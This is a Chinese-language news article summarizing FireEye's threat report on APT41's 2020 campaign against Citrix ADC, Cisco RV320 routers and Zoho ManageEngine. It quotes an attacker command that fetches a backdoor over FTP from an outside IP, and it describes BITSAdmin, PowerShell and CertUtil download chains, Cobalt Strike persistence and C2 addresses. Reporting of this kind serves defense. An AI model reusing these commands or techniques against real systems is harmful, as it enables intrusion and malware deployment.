美國網絡安全巨頭FireEye於近日發文稱,被他們判定來自中國的黑客組織APT41從今年年初開始發起了自該組織成立以來規模最大的入侵活動,波及澳大利亞、加拿大、丹麥、芬蘭、法國、印度、意大利、日本、馬來西亞、墨西哥、菲律賓、波蘭、卡塔爾、沙特阿拉伯、新加坡、瑞典、瑞士、阿聯酋、英國以及美國等數十個國家。
FireEye在文章中指出,在1月20日至3月11日期間,APT41利用Citrix NetScaler/ADC、思科路由器以及Zoho ManageEngine Desktop Central中的漏洞攻擊了分屬銀行/金融、建築、國防、政府、醫療、高科技、高等教育、法律、製造業、媒體、非營利、石油和天然氣、石化、製藥、房地產、電信、運輸、旅行以及軟件等眾多行業的組織,其中有超過75家是FireEye的客戶。
為了證實其說法的真實性,FireEye在文章中還公佈了他們針對這起入侵活動的調查成果。接下來,就讓我們一起來看看吧。
CVE-2019-19781(Citrix ADC漏洞)利用活動
FireEye表示,APT41從1月20日開始試圖利用CVE-2019-19781(於2019年12月17日被公開披露)入侵Citrix Application Delivery Controller(ADC)和Citrix Gateway設備。
圖1.FireEye整理的關鍵事件時間表
1月20日和1月21日的CVE-2019-19781漏洞利用活動涉及到執行命令“file /bin/pwd”,這可以幫助APT41實現兩個目標:一是能夠確認系統是否已安裝補丁,進而判斷設備是否能夠被入侵;二是能夠獲取到與系統體系結構相關的信息(據稱,這是為了給後續部署後門做準備)。
圖2.CVE-2019-19781漏洞利用HTTP流量示例(1月20日和1月21日)
1月23至2月1日,漏洞利用活動出現了短暫的中斷。FireEye認為,這很可能與1月24日至1月30期間的中國農曆新年假期有關。
從2月1日開始,APT41開始執行命令“/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd”,以下載被命名為“bsd”的有效載荷(被FireEye懷疑是一種新後門)。
圖3.CVE-2019-19781漏洞利用HTTP流量示例(2月1日)
2月2日至2月19日,漏洞利用活動再次中斷。FireEye認為,這很可能與中國爆發的新型肺炎疫情有關。
2月24日和2月25日,針對CVE-2019-19781的漏洞利用明顯增加,且利用行為幾乎與2月1日的活動幾乎完全一致,僅僅是將有效載荷的名稱更改為了“un”。
圖4. CVE-2019-19781漏洞利用HTTP流量示例(2月24日和2月25日)
思科路由器漏洞利用活動
FireEye表示,APT41在2月21日成功利用漏洞侵入了一家電信組織的Cisco RV320路由器,並下載了名為“fuc”的有效載荷。儘管尚不清楚利用的是哪些漏洞,但可以的是,其中一個模塊結合利用了CVE-2019-1653和CVE-2019-1652,這允許攻擊者在Cisco RV320和RV325小型企業路由器上實現遠程代碼執行,並使用wget下載指定的有效載荷。
圖5.Cisco RV320路由器通過wget下載有效載荷的HTTP請求示例
CVE-2020-10189(Zoho ManageEngine零日漏洞)利用活動
FireEye表示,APT41從3月8日開始試圖利用CVE-2020-10189攻擊目標組織,設計兩種有效載荷部署方式。
第一種方式涉及利用CVE-2020-10189漏洞直接上傳基於Java的簡單程序“logger.zip”,其中包含一組可用於使用PowerShell下載並執行install.bat和storesyncsvc.dll的命令。
圖6.logger.zip的內容
第二種方式涉及利用Microsoft BITSAdmin命令行工具從端口12345上的已知APT41基礎設施66[.]42[.]98[.]220下載install.bat。
無論是方式一還是方式二,它們都涉及到使用install.bat來實現被命名為“storesyncsvc.dll”的Cobalt Strike BEACON加載程序的長久駐留。
圖7.install.bat的內容
在漏洞利用成功之後,APT41使用storecyncsvc.dll BEACON後門下載了另一個具有不同C2地址的輔助後門,進而利用該後門下載了2.exe(VMProtected Meterpreter下載器,用於下載Cobalt Strike BEACON shellcode)。
圖8.通過CertUtil下載2.exe的HTTP請求示例
Meterpreter下載器“TzGG”被配置為通過端口443與91[.]208[.]184[.]78通信,以下載Cobalt Strike BEACON(試用版)的shellcode。
圖9.下載Cobalt Strike BEACON shellcode的HTTP請求示例
結語
FireEye表示,在這場規模龐大的入侵活動中,儘管APT41使用的是一些公開可用的惡意軟件(如Cobalt Strike和Meterpreter),但從該組織此前的活動來看,他們必定會在後續部署更為高級的惡意軟件。
FireEye還表示,即使到了2020年,APT41在他們所追蹤的黑客組織中仍是最強勁的一個。新發現的這場入侵活動也再次表明,該組織確實擁有快速利用新披露的漏洞來發起攻擊的能力。
閱讀更多 黑客視界 的文章
